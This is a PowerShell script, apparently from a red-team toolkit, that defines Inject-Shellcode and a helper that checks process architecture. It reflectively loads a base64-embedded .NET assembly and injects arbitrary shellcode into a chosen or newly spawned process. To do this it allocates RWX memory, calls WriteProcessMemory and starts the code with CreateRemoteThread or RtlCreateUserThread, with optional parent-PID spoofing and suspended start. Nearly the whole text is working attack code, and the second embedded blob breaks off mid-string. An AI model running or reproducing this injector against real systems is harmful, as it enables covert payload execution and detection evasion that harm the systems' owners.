function Inject-Shellcode ([switch]$x86, [switch]$x64, $ParentID, [switch]$RtlCreateUserThread, [switch]$Force, [switch]$Suspended, [Parameter(Mandatory=$true)]$Shellcode, $ProcID, $ProcessPath, $ProcPath, $ProcessName, $ProcName)
{
<#
.SYNOPSIS
Inject-Shellcode

Author: @benpturner
 
.DESCRIPTION
Injects shellcode into x86 or x64 bit processes. Tested on Windowns 7 32 bit, Windows 7 64 bit and Windows 10 64bit.

.EXAMPLE
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ParentID 4502

.EXAMPLE
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 5634

.EXAMPLE
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcessPath C:\Windows\System32\notepad.exe

.EXAMPLE
Inject-Shellcode -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcessName notepad.exe

#>

if($ProcName){
    $ProcessName = $ProcName
}
if($ProcPath){
    $ProcessPath = $ProcPath
}
$p = "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LQCcBwEABIAAAAEAAAAAAAAAAAAAAAAAGAgAAAIAAAAAAAAAAAAAAGAAuQEAAAAAAgAAAAAAAAAAAAAAYADDBQAAAAAGAAQABwAEAAgABAAJAAQACgAFAAsABQAMAAUAAAAAAABrZXJuZWwzMgBjYlJlc2VydmVkMgBscFJlc2VydmVkMgA8TW9kdWxlPgBFWEVDVVRFX1JFQUQAU1VTUEVORF9SRVNVTUUAVEVSTUlOQVRFAElNUEVSU09OQVRFAFBBR0VfUkVBRFdSSVRFAEVYRUNVVEVfUkVBRFdSSVRFAEVYRUNVVEUATUVNX1JFU0VSVkUAV1JJVEVfV0FUQ0gAUEhZU0lDQUwAU0VUX1RIUkVBRF9UT0tFTgBQUk9DRVNTX0lORk9STUFUSU9OAFNFVF9JTkZPUk1BVElPTgBRVUVSWV9JTkZPUk1BVElPTgBESVJFQ1RfSU1QRVJTT05BVElPTgBUT1BfRE9XTgBTVEFSVFVQSU5GTwBMQVJHRV9QQUdFUwBTRUNVUklUWV9BVFRSSUJVVEVTAE5PQUNDRVNTAFBST0NFU1NfQUxMX0FDQ0VTUwBSRVNFVABNRU1fQ09NTUlUAEdFVF9DT05URVhUAFNFVF9DT05URVhUAFNUQVJUVVBJTkZPRVgAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAGR3WQB2YWx1ZV9fAGNiAG1zY29ybGliAHNyYwBscFRocmVhZElkAGR3VGhyZWFkSWQAcGFyZW50UHJvY2Vzc0lkAGR3UHJvY2Vzc0lkAENsaWVudElkAEdldFByb2Nlc3NCeUlkAFN1c3BlbmRUaHJlYWQAUmVzdW1lVGhyZWFkAENyZWF0ZVJlbW90ZVRocmVhZABoVGhyZWFkAE9wZW5UaHJlYWQAUnRsQ3JlYXRlVXNlclRocmVhZABDcmVhdGVTdXNwZW5kZWQAbHBSZXNlcnZlZABnZXRfSGFuZGxlAEdldE1vZHVsZUhhbmRsZQBDbG9zZUhhbmRsZQBiSW5oZXJpdEhhbmRsZQBscFRpdGxlAGhNb2R1bGUAcHJvY05hbWUAbHBNb2R1bGVOYW1lAGxwQXBwbGljYXRpb25OYW1lAGxwQ29tbWFuZExpbmUAVmFsdWVUeXBlAGZsQWxsb2NhdGlvblR5cGUAVXBkYXRlUHJvY1RocmVhZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBscFZhbHVlAGxwUHJldmlvdXNWYWx1ZQBkd1hTaXplAGR3WVNpemUAZ2V0X1NpemUAY2JTaXplAENvbW1pdHRlZFN0YWNrU2l6ZQBNYXhpbXVtU3RhY2tTaXplAGR3U3RhY2tTaXplAGxwUmV0dXJuU2l6ZQBscFNpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBuTGVuZ3RoAEFsbG9jSEdsb2JhbABGcmVlSEdsb2JhbABNYXJzaGFsAGtlcm5lbDMyLmRsbABudGRsbC5kbGwASW5qZWN0LmRsbABtc3ZjcnQuZGxsAEZpbGwAU3lzdGVtAEVudW0AbHBOdW1iZXJPZkJ5dGVzV3JpdHRlbgBscFByb2Nlc3NJbmZvcm1hdGlvbgBwRGVzdGluYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGxwQnVmZmVyAFBQSURTcG9vZmVyAGxwUGFyYW1ldGVyAGhTdGRFcnJvcgAuY3RvcgBUaHJlYWRTZWN1cml0eURlc2NyaXB0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IAV3JpdGVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGJJbmhlcml0SGFuZGxlcwBscFRocmVhZEF0dHJpYnV0ZXMAbHBQcm9jZXNzQXR0cmlidXRlcwBkd0NyZWF0aW9uRmxhZ3MAZHdGbGFncwBkd1hDb3VudENoYXJzAGR3WUNvdW50Q2hhcnMAVGhyZWFkQWNjZXNzAGR3RGVzaXJlZEFjY2VzcwBDcmVhdGVQcm9jZXNzAGhQcm9jZXNzAE9wZW5Qcm9jZXNzAEdldEN1cnJlbnRQcm9jZXNzAEdldFByb2NBZGRyZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRBZGRyZXNzAFplcm9CaXRzAGhPYmplY3QASW5qZWN0AGZsUHJvdGVjdABvcF9FeHBsaWNpdABscEVudmlyb25tZW50AGR3QXR0cmlidXRlQ291bnQAY291bnQAZGVzdABEZWxldGVQcm9jVGhyZWFkQXR0cmlidXRlTGlzdABJbml0aWFsaXplUHJvY1RocmVhZEF0dHJpYnV0ZUxpc3QAbHBBdHRyaWJ1dGVMaXN0AGhTdGRJbnB1dABoU3RkT3V0cHV0AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AG1lbWNweQBSdGxGaWxsTWVtb3J5AFdyaXRlUHJvY2Vzc01lbW9yeQBscEN1cnJlbnREaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0eQAAAAAAYihxsqz3r0aJ+BJ+RTw9RAAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgcIESARGBgRJBEkGBgIBAABCBwCBhgFAAICGBgEAAEYGAUAARJVCAMgABgDAAAIBAABGAgFAAIBGBgEAAEBGAIGCQIGCAi3elxWGTTgiQT/Dx8ABAAQAAAEACAAAAQEAAAABAAACAAEAAAAIAQAAEAABAAAEAAEAAAgAAQQAAAABCAAAAAEQAAAAASAAAAABAEAAAAEAgAAAAQIAAAABAABAAAEAAIAAAQABAAAAQICBg4CBgYDBhEcAwYRKAMGESwDBhEw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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAADAAAAGQ5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
$dl  = [System.Convert]::FromBase64String($p)
$a = [System.Reflection.Assembly]::Load($dl)
$o = New-Object Inject
$pst = New-Object System.Diagnostics.ProcessStartInfo
$pst.UseShellExecute = $False
$pst.CreateNoWindow = $True
$pst.FileName = "C:\Windows\system32\netsh.exe"
echo ""
echo "[+] Inject-Shellcode"


if ($x86.IsPresent) {
    if ($env:PROCESSOR_ARCHITECTURE -eq "x86"){
        $pst.FileName = "C:\Windows\System32\netsh.exe"
    } else {
        $pst.FileName = "C:\Windows\Syswow64\netsh.exe"
    }
}

if ($Suspended.IsPresent) {
    $SuspendedState = $true
} else {
    $SuspendedState = $false
}
   
if ($ProcessPath) {

    if (($SuspendedState) -and ($ParentID)) {

        $Success = [PPIDSpoofer]::CreateProcess($ParentID, $ProcessPath, $true)
        echo "[+] Parent Spoofing & Suspended Process Start: $ParentID"
        $injectpid = $Success
        echo "[+] New PID: $Success"

    } elseif ((!$SuspendedState) -and ($ParentID)) {

        $Success = [PPIDSpoofer]::CreateProcess($ParentID, $ProcessPath, $false)
        echo "[+] Parent Spoofing $ParentID"
        $injectpid = $Success
        echo "[+] Suspended PID: $Success"

    } elseif (($SuspendedState) -and (!$ParentID)) {

        $Success = [PPIDSpoofer]::CreateProcess(0, $ProcessPath, $true)
        echo "[+] Suspended Process Start"
        $injectpid = $Success
        echo "[+] New PID: $Success"

    } else {

        $pst.FileName = "$ProcessPath"
        $Process = [System.Diagnostics.Process]::Start($pst)
        $injectpid = $Process.ID
    }

} elseif ($ProcessName) {

    $Process = [System.Diagnostics.Process]::GetProcessesByName($ProcessName)

} elseif ($ProcID){

    $Process = [System.Diagnostics.Process]::GetProcessById($ProcID)
    $injectpid = $ProcID
    
} else {

    $Process = [System.Diagnostics.Process]::Start($pst)
    $injectpid = $Process.ID
}

$ProcessX86 = IsProcess-x86 $injectpid
$ProcessIDVal = $injectpid
$Proceed = $false

if (($x86.IsPresent) -and ($ProcessX86)) {
    echo "[+] Running against x86 process with ID: $ProcessIDVal"
    $Proceed = $true
} elseif (($env:PROCESSOR_ARCHITECTURE -eq "x86") -and ($ProcessX86)) {
    echo "[+] Running against x86 process with ID: $ProcessIDVal"
    $Proceed = $true
} elseif ($ProcessX86) {
    echo "[-] x86 process identified, use -x86 or this could crash the process"
    echo "If you believe this is wrong use -Force to try injection anyway - use at own risk"
    $Proceed = $false
} else {
    echo "[+] Running against x64 process with ID: $ProcessIDVal"
    $Proceed = $true
}

$CurrentProcX86 = IsProcess-x86 $PID
if ($CurrentProcX86) {
    echo "[+] Current process arch is x86: $PID"
} else {
    echo "[+] Current process arch is x64: $PID"    
}
echo ""

if ($Proceed) {

try {
    [IntPtr]$phandle = [Inject]::OpenProcess([Inject]::PROCESS_ALL_ACCESS, $false, $injectpid);
    [IntPtr]$zz = 0x10000
    [IntPtr]$x = 0
    [IntPtr]$nul = 0
    [IntPtr]$max = 0x70000000
    while( $zz.ToInt32() -lt $max.ToInt32() )
    {
        $x=[Inject]::VirtualAllocEx($phandle,$zz,$Shellcode.Length*2,0x3000,0x40)
        if( $x.ToInt32() -ne $nul.ToInt32() ){ 
        break 
        }
        $zz = [Int32]$zz + $Shellcode.Length
    }
    echo "VirtualAllocEx"
    echo "[+] $x"
    if( $x.ToInt32() -gt $nul.ToInt32() )
    {
        
        $hg = [Runtime.InteropServices.Marshal]::AllocHGlobal($Shellcode.Length)
        [Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $hg, $Shellcode.Length)
        $s = [Inject]::WriteProcessMemory($phandle,[IntPtr]($x.ToInt32()),$hg, $Shellcode.Length,0)
        echo "WriteProcessMemory"
        echo "[+] $s"

        if ($RtlCreateUserThread.IsPresent){

            $TokenHandle = [IntPtr]::Zero
            $c = [Inject]::RtlCreateUserThread($phandle,0,0,0,0,0,[IntPtr]$x,0,[ref] $TokenHandle,0)    
            echo "RtlCreateUserThread"
            $hexVal = "{0:x}" -f $c
            if ($hexVal -eq "c0000022") {
                echo "[-] Access Denied 0xC0000022"
            } else {
                echo "[+] Dec: $c"
                echo "[+] Hex: 0x$($hexVal)"        
            }

        } else {
        
            $e = [Inject]::CreateRemoteThread($phandle,0,0,[IntPtr]$x,0,0,0)

            echo "CreateRemoteThread"
            $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
            echo "[+] $e"  

            if ($e -eq 0) {
                $TokenHandle = [IntPtr]::Zero
                $c = [Inject]::RtlCreateUserThread($phandle,0,0,0,0,0,[IntPtr]$x,0,[ref] $TokenHandle,0)    
                echo "RtlCreateUserThread"
                $hexVal = "{0:x}" -f $c
                if ($hexVal -eq "c0000022") {
                    echo "[-] Access Denied 0xC0000022"
                } else {
                    echo "[+] Dec: $c"
                    echo "[+] Hex: 0x$($hexVal)"        
                }
            }

        }
        
        $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
        echo "[-] LastError: $Lasterror"    
    } else {
        echo "[-] Failed using VirtualAllocEx"
        $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
        echo "[-] LastError: $Lasterror"  
        echo ""
    }
} catch {
    echo $Error[0]  
}

}
}

$psloadedprochandler = $null
Function IsProcess-x86 ($processID) {

if ($psloadedprochandler -ne "TRUE") {
    $script:psloadedprochandler = "TRUE"
    $ps = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDACx/YFoAAAAAAAAAAOAAIiALATAAAAgAAAAGAAAAAAAAJicAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANQmAABPAAAAAEAAAKgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAACcJQAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAALAcAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgDAAAAQAAAAAQAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAIJ